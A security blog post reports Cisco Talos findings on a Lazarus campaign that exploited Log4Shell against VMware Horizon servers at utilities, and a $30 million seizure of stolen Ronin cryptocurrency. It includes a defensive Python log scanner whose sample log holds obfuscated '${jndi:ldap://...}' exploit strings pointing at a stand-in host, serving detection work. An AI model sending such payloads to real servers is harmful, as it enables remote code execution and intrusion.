The state-sponsored Lazarus hacking group, based in North Korea, has repeatedly attracted attention for ransomware attacks and espionage. Now Cisco Talos has uncovered an attack campaign that targeted utility companies in North America and Japan. In addition, US law enforcement, working with the cryptocurrency industry, has managed to seize $30 million in cryptocurrency stolen in the attack on Axie Infinity's Ronin Network, in which the hackers had captured around $600 million.
Lazarus attacks via Log4j
Cisco Talos, Cisco's threat intelligence unit, has tracked a new campaign by the Lazarus APT group, a state-backed hacking group attributed to North Korea by the U.S. government as well as many security firms. I came across the article Lazarus and the tale of three RATs, published a few days ago with the details, via the following tweet.
The campaign, which the Lazarus Group ran between February and July 2022, exploited vulnerabilities in VMware Horizon to gain a foothold in the targeted organizations. The initial vector was the Log4j vulnerability (Log4Shell, CVE-2021-44228) on unpatched, Internet-facing VMware Horizon servers. I had reported on this vulnerability several times on the blog (see the links at the end of the article). If you ask a search engine like Shodan for VMware installations reachable from the Internet, you will see quite a lot of red (see the following figure).
Once a foothold in the corporate networks had been established, the group deployed its VSingle and YamaBot malware implants. Alongside these known malware families, the security researchers also found a previously unknown implant, which they call "MagicRAT".
Lazarus attack chain, source: Talos
Parts of this campaign had already been uncovered by other security firms, but Cisco Talos can reveal more details about the adversary's modus operandi. The researchers also identified overlaps in command-and-control (C2) and payload-hosting infrastructure between their own findings and a June 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). That CISA advisory addressed continued attempts by threat actors to compromise vulnerable VMware Horizon servers.
The targets include utilities around the world, among them organizations headquartered in the United States, Canada and Japan. The campaign aims to infiltrate these organizations in order to gain long-term access and subsequently exfiltrate data of interest to the adversary's nation-state. Details can be found in the Talos blog post.
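Since the initial vector in this campaign was Log4Shell against Internet-facing Horizon servers, a practical first check is to hunt for exploitation attempts in the access logs of whatever sits in front of those servers. The following Python script is an added example for this post, not code from Cisco Talos, VMware or the blog author. It assumes combined access-log format (as a reverse proxy or load balancer would write it) and handles the common nesting tricks attackers use to hide the `${jndi:` lookup (`${lower:}`, `${upper:}`, `${::-}` and `${env:X:-}`, plus URL encoding); the sample log lines and the TEST-NET addresses in them are constructed for illustration.

```python
"""Hunt for Log4Shell (CVE-2021-44228) exploitation attempts in access logs.

Added example for this post, not code from Cisco Talos, VMware or the blog.
Assumptions: logs are in the common combined access-log format, as a reverse
proxy or load balancer in front of a VMware Horizon connection server would
write them; the sample lines below are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Log4j 2.x lookups that evaluate to a plain string. Attackers nest them
# inside "${jndi:...}" so that a naive substring search for "jndi" misses
# the payload. Each pattern captures the text the lookup evaluates to.
_OBFUSCATION = [
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE),  # ${lower:j} -> j
    re.compile(r"\$\{[^${}]*?:-([^${}]*)\}"),                       # ${::-j}, ${env:X:-j} -> j
]

# Canonical form after normalization: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:[a-z]+:[^}]*\}?")
_CALLBACK_HOST = re.compile(r"://([^/:}\s]+)")


def normalize(text: str, rounds: int = 5) -> str:
    """URL-decode and collapse innermost lookups until the text is stable,
    so '${${lower:j}${::-n}di:ldap://h/x}' becomes '${jndi:ldap://h/x}'.
    The rounds cap bounds the work spent on deliberately deep nesting."""
    s = text
    for _ in range(rounds):
        before = s
        s = unquote(s)
        for pat in _OBFUSCATION:
            s = pat.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s.lower()


def find_log4shell(line: str):
    """Return the normalized ${jndi:...} payload found in a log line, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan(log_text: str) -> list:
    """Scan combined-format access log text; return one finding per hit
    with the client IP, the decoded payload and the attacker callback host."""
    findings = []
    for line in log_text.splitlines():
        payload = find_log4shell(line)
        if payload is None:
            continue
        host = _CALLBACK_HOST.search(payload)
        findings.append({
            "ip": line.split(" ", 1)[0],  # first field of the combined format
            "payload": payload,
            "callback": host.group(1) if host else None,
        })
    return findings


# Constructed sample log (not real traffic). Lines 1 and 5 are benign; line 5
# even contains "jndi" and "$" without a lookup, to show no false positive.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2022:10:01:12 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2022:10:01:15 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"
203.0.113.9 - - [10/Mar/2022:10:01:16 +0000] "GET /portal/info.jsp?x=%24%7B%24%7Blower%3Aj%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.11 - - [10/Mar/2022:10:02:01 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0 ${${upper:j}ndi:rmi://192.0.2.10:1099/x}"
203.0.113.12 - - [10/Mar/2022:10:02:30 +0000] "GET /docs/jndi-config.html?price=$100 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Two caveats when using this in practice: a front-end only logs the fields it is configured to log, while the vulnerable Log4j call may be fed from any request header the application itself records, so a clean proxy log does not prove the Horizon server was not hit; and the callback hosts the script extracts are worth feeding into egress-firewall and DNS logs, because a successful exploit shows up as an outbound LDAP, RMI or HTTP connection from the Horizon server to exactly those hosts.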
$30 million in stolen cryptocurrency seized
One of the Lazarus APT group's goals is to raise foreign currency for North Korea through digital heists. In March 2022, more than $600 million was stolen from the Ronin Network, the network behind the play-to-earn game Axie Infinity. The Lazarus Group is suspected of being behind the theft.
In the post $30 Million Seized: How the Cryptocurrency Community Is Making It Difficult for North Korean Hackers To Profit, researchers at Chainalysis report how, together with law enforcement and leading organizations in the cryptocurrency industry, they managed to seize part of the looted funds: more than $30 million worth of cryptocurrency stolen by hackers with North Korean ties. According to Chainalysis, this is the first time that cryptocurrency stolen by a North Korean hacking group has been seized, and the researchers are confident that it won't be the last. Details can be read in their article.
0-day CVE-2021-44228 in Java library log4j puts many projects at risk
log4j vulnerability CVE-2021-44228: Patch your Minecraft
VMware products threatened by log4j vulnerability CVE-2021-44228
log4j FAQ and Repository
Belgian Ministry of Defense affected by Log4j?
QNAP firmware update version QTS 188.8.131.521 build 20211221 and log4j vulnerability
Log4j security messages (12/28/2021)
Windows Defender: Fixes, Issues and Log4j scanner false alarms
RCE vulnerability – similar to log4j – discovered in H2 (Java) database system
Attacks on VMWare Horizon servers with log4j vulnerability
Log4J: SMEs not aware, DHS sees problems for a decade